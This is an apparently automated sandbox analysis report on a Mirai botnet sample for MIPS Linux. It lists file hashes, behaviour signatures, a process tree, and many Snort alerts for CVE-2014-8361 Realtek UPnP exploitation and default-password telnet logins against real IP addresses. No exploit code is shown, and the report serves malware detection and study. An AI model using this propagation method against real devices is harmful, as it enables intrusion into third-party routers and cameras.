Play interactive tour

Edit tour

Linux Analysis Report fbXTgwatuJ

Overview

General Information

Sample Name:	fbXTgwatuJ
Analysis ID:	518864
MD5:	24f322c83a02e56c509deb0f9baf28b4
SHA1:	f60f06d2c600694d5b0446d7a9bc4d85ae25366b
SHA256:	bd1499d689ff1b6cd861b79f18c133709f6bcb118bb07956aa10848d3adac7d7
Tags:	32elfmipsmirai
Infos:
Most interesting Screenshot:

Detection

Mirai

Score:	76
Range:	0 - 100
Whitelisted:	false

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected Mirai

Multi AV Scanner detection for submitted file

Uses known network protocols on non-standard ports

Sample tries to kill many processes (SIGKILL)

Connects to many ports of the same IP (likely port scanning)

Sample has stripped symbol table

HTTP GET or POST without a user agent

Uses the "uname" system call to query kernel version information (possible evasion)

Enumerates processes within the "proc" file system

Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)

Detected TCP or UDP traffic on non-standard ports

Sample listens on a socket

Sample tries to kill a process (SIGKILL)

Classification

Analysis Advice

Static ELF header machine description suggests that the sample might only run correctly on MIPS or ARM architectures

All HTTP servers contacted by the sample do not answer. Likely the sample is an old dropper which does no longer work

Static ELF header machine description suggests that the sample might not execute correctly on this machine

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	518864
Start date:	10.11.2021
Start time:	02:54:25
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 5m 26s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	fbXTgwatuJ
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Detection:	MAL
Classification:	mal76.spre.troj.lin@0/2@0/0
Warnings:	Show All Report size exceeded maximum capacity and may have missing network information. TCP Packets have been reduced to 100

Process Tree

system is lnxubuntu20

fbXTgwatuJ (PID: 5221, Parent: 5117, MD5: 0d6f61f82cf2f781c6eb0661071d42d9) Arguments: /tmp/fbXTgwatuJ

fbXTgwatuJ New Fork (PID: 5240, Parent: 5221)

fbXTgwatuJ New Fork (PID: 5241, Parent: 5221)

fbXTgwatuJ New Fork (PID: 5242, Parent: 5221)

fbXTgwatuJ New Fork (PID: 5246, Parent: 5242)

fbXTgwatuJ New Fork (PID: 5247, Parent: 5242)

fbXTgwatuJ New Fork (PID: 5249, Parent: 5242)

fbXTgwatuJ New Fork (PID: 5253, Parent: 5242)

fbXTgwatuJ New Fork (PID: 5254, Parent: 5242)

systemd New Fork (PID: 5273, Parent: 1)

sshd (PID: 5273, Parent: 1, MD5: dbca7a6bbf7bf57fedac243d4b2cb340) Arguments: /usr/sbin/sshd -t

systemd New Fork (PID: 5274, Parent: 1)

sshd (PID: 5274, Parent: 1, MD5: dbca7a6bbf7bf57fedac243d4b2cb340) Arguments: /usr/sbin/sshd -D

cleanup

Yara Overview

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Mirai_12	Yara detected Mirai	Joe Security

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for submitted file

Show sources

Source: fbXTgwatuJ	Virustotal: Detection: 59%	Perma Link
Source: fbXTgwatuJ	Metadefender: Detection: 51%	Perma Link
Source: fbXTgwatuJ	ReversingLabs: Detection: 71%

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58390 -> 185.235.182.98:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:58390 -> 185.235.182.98:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58392 -> 185.235.182.98:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59448 -> 45.197.145.182:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:59448 -> 45.197.145.182:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 91.244.81.150:23 -> 192.168.2.23:36186
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:55764 -> 91.188.124.94:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:55764 -> 91.188.124.94:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:55766 -> 91.188.124.94:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53276 -> 45.41.89.171:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:53276 -> 45.41.89.171:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 117.25.167.226:23 -> 192.168.2.23:47442
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41488 -> 45.197.148.78:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:41488 -> 45.197.148.78:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42654 -> 185.91.123.226:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:42654 -> 185.91.123.226:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42658 -> 185.91.123.226:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 89.237.95.5:23 -> 192.168.2.23:39494
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 89.237.95.5:23 -> 192.168.2.23:39494
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41860 -> 45.43.237.52:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:41860 -> 45.43.237.52:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:46462 -> 185.241.255.62:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:46462 -> 185.241.255.62:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:40540 -> 185.71.66.92:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:40540 -> 185.71.66.92:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:46468 -> 185.241.255.62:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:40546 -> 185.71.66.92:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 177.127.96.72:23 -> 192.168.2.23:39738
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 177.127.96.72:23 -> 192.168.2.23:39738
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37870 -> 45.116.212.179:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:37870 -> 45.116.212.179:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:57434 -> 45.121.82.24:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:57434 -> 45.121.82.24:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37874 -> 45.116.212.179:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 117.25.167.226:23 -> 192.168.2.23:47492
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:38796 -> 91.214.119.7:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:38796 -> 91.214.119.7:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:38816 -> 91.214.119.7:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:36614 -> 91.78.35.27:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:36614 -> 91.78.35.27:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43812 -> 45.41.88.59:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:43812 -> 45.41.88.59:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34004 -> 45.114.50.18:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:34004 -> 45.114.50.18:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:36616 -> 91.78.35.27:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34028 -> 45.114.50.18:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 117.131.138.46:23 -> 192.168.2.23:55502
Source: Traffic	Snort IDS: 716 INFO TELNET access 117.131.138.46:23 -> 192.168.2.23:55508
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53300 -> 45.115.240.71:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:53300 -> 45.115.240.71:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 60.175.152.13:23 -> 192.168.2.23:36508
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 60.175.152.13:23 -> 192.168.2.23:36508
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:54196 -> 45.42.87.221:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:54196 -> 45.42.87.221:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58388 -> 91.77.96.32:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:58388 -> 91.77.96.32:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59762 -> 45.133.119.252:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:59762 -> 45.133.119.252:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58396 -> 91.77.96.32:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:38340 -> 45.41.87.52:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:38340 -> 45.41.87.52:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 117.131.138.46:23 -> 192.168.2.23:55526
Source: Traffic	Snort IDS: 716 INFO TELNET access 117.25.167.226:23 -> 192.168.2.23:47568
Source: Traffic	Snort IDS: 716 INFO TELNET access 117.131.138.46:23 -> 192.168.2.23:55544
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43876 -> 45.119.104.113:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:43876 -> 45.119.104.113:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 117.131.138.46:23 -> 192.168.2.23:55550
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43878 -> 45.119.104.113:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:56634 -> 91.76.243.250:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:56634 -> 91.76.243.250:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:56648 -> 91.76.243.250:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 89.237.95.5:23 -> 192.168.2.23:39610
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 89.237.95.5:23 -> 192.168.2.23:39610
Source: Traffic	Snort IDS: 716 INFO TELNET access 117.131.138.46:23 -> 192.168.2.23:55560
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:51914 -> 45.33.253.200:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:51914 -> 45.33.253.200:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 117.131.138.46:23 -> 192.168.2.23:55576
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33478 -> 45.113.3.227:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:33478 -> 45.113.3.227:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35474 -> 45.33.249.140:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:35474 -> 45.33.249.140:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 117.131.138.46:23 -> 192.168.2.23:55592
Source: Traffic	Snort IDS: 716 INFO TELNET access 117.25.167.226:23 -> 192.168.2.23:47634
Source: Traffic	Snort IDS: 716 INFO TELNET access 117.131.138.46:23 -> 192.168.2.23:55598
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41662 -> 185.113.135.250:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:41662 -> 185.113.135.250:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41664 -> 185.113.135.250:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 177.127.96.72:23 -> 192.168.2.23:39874
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 177.127.96.72:23 -> 192.168.2.23:39874
Source: Traffic	Snort IDS: 2023333 ET TROJAN Linux.Mirai Login Attempt (xc3511) 192.168.2.23:52442 -> 109.106.27.90:23
Source: Traffic	Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:52442 -> 109.106.27.90:23
Source: Traffic	Snort IDS: 716 INFO TELNET access 117.131.138.46:23 -> 192.168.2.23:55616
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:49302 -> 45.197.137.128:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:49302 -> 45.197.137.128:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:40762 -> 185.225.195.245:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:40762 -> 185.225.195.245:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:54786 -> 45.195.65.178:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:54786 -> 45.195.65.178:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 91.244.81.150:23 -> 192.168.2.23:36456
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:47164 -> 45.207.192.10:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:47164 -> 45.207.192.10:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:40770 -> 185.225.195.245:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58712 -> 45.43.237.190:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:58712 -> 45.43.237.190:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:47174 -> 45.207.192.10:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 117.25.167.226:23 -> 192.168.2.23:47716
Source: Traffic	Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:44200 -> 213.87.35.20:23
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 60.175.152.13:23 -> 192.168.2.23:36672
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 60.175.152.13:23 -> 192.168.2.23:36672
Source: Traffic	Snort IDS: 716 INFO TELNET access 121.162.243.3:23 -> 192.168.2.23:37356
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 89.237.95.5:23 -> 192.168.2.23:39756
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 89.237.95.5:23 -> 192.168.2.23:39756
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 213.87.35.20:23 -> 192.168.2.23:44200
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 213.87.35.20:23 -> 192.168.2.23:44200
Source: Traffic	Snort IDS: 716 INFO TELNET access 117.25.167.226:23 -> 192.168.2.23:47774
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:45780 -> 45.133.119.31:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:45780 -> 45.133.119.31:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42928 -> 45.43.233.242:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:42928 -> 45.43.233.242:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43580 -> 91.220.244.205:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:43580 -> 91.220.244.205:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43584 -> 91.220.244.205:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 177.127.96.72:23 -> 192.168.2.23:40052
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 177.127.96.72:23 -> 192.168.2.23:40052
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:49506 -> 91.214.119.221:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:49506 -> 91.214.119.221:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:49536 -> 91.214.119.221:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41692 -> 45.42.90.221:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:41692 -> 45.42.90.221:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 117.25.167.226:23 -> 192.168.2.23:47856
Source: Traffic	Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:47856 -> 117.25.167.226:23
Source: Traffic	Snort IDS: 716 INFO TELNET access 121.162.243.3:23 -> 192.168.2.23:37476
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 60.175.152.13:23 -> 192.168.2.23:36846
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 60.175.152.13:23 -> 192.168.2.23:36846
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 89.237.95.5:23 -> 192.168.2.23:39902
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 89.237.95.5:23 -> 192.168.2.23:39902
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:55562 -> 45.33.243.230:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:55562 -> 45.33.243.230:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 213.87.35.20:23 -> 192.168.2.23:44336
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 213.87.35.20:23 -> 192.168.2.23:44336
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44028 -> 185.65.161.27:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:44028 -> 185.65.161.27:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44378 -> 185.235.180.0:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:44378 -> 185.235.180.0:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44044 -> 185.65.161.27:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44382 -> 185.235.180.0:52869
Source: Traffic	Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:38364 -> 201.137.106.15:23
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 165.21.107.114:23 -> 192.168.2.23:60716
Source: Traffic	Snort IDS: 716 INFO TELNET access 117.25.167.226:23 -> 192.168.2.23:47904
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37144 -> 45.42.84.116:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:37144 -> 45.42.84.116:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33498 -> 45.120.110.131:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:33498 -> 45.120.110.131:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33504 -> 45.120.110.131:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:46470 -> 45.158.20.3:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:46470 -> 45.158.20.3:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:55482 -> 45.127.162.252:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:55482 -> 45.127.162.252:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:55950 -> 185.235.182.132:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:55950 -> 185.235.182.132:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:55952 -> 185.235.182.132:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 123.159.71.227:23 -> 192.168.2.23:50976
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 177.127.96.72:23 -> 192.168.2.23:40192
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 177.127.96.72:23 -> 192.168.2.23:40192
